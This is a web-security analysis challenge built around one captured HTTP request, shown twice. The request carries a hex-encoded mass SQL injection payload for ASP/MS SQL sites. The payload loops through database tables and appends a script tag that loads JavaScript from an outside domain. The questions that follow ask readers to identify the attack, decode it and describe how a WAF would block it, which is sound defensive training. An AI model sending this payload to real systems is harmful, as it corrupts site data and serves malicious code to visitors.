rcbarnett-zz/Analysis Challenge #1

## Analysis Challenge #1
Review this HTTP request -

GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522053454c45435420612e6e616d652c622e6e616d652046524f4d207379736f626a6563747320612c737973636f6c756d6e73206220574845524520612e69643d622e696420414e4420612e78747970653d27752720414e442028622e78747970653d3939204f5220622e78747970653d3335204f5220622e78747970653d323331204f5220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d525452494d28434f4e5645525428564152434841522834303030292c5b272b40432b275d29292b27273c736372697074207372633d73646f2e313030306d672e636e2f63737273732f772e6a733e3c2f7363726970743e27272729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f7220%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Accept-Language: en-US
Accept-Encoding: deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: www.example.com
Connection: Close

Questions:  Please provide as much detail as possible for steps used to answer these questions.
What type of attack is this?
Can you decode the attack payload?
What is the end goal of the attack?
How could a WAF detect and block this attack?
	Review this HTTP request -

	GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522053454c45435420612e6e616d652c622e6e616d652046524f4d207379736f626a6563747320612c737973636f6c756d6e73206220574845524520612e69643d622e696420414e4420612e78747970653d27752720414e442028622e78747970653d3939204f5220622e78747970653d3335204f5220622e78747970653d323331204f5220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d525452494d28434f4e5645525428564152434841522834303030292c5b272b40432b275d29292b27273c736372697074207372633d73646f2e313030306d672e636e2f63737273732f772e6a733e3c2f7363726970743e27272729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f7220%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1
	Accept: text/html, application/xml;q=0.9, application/xhtml+xml, /;q=0.1
	Accept-Language: en-US
	Accept-Encoding: deflate
	User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
	Host: www.example.com
	Connection: Close

	Questions: Please provide as much detail as possible for steps used to answer these questions.
	What type of attack is this?
	Can you decode the attack payload?
	What is the end goal of the attack?
	How could a WAF detect and block this attack?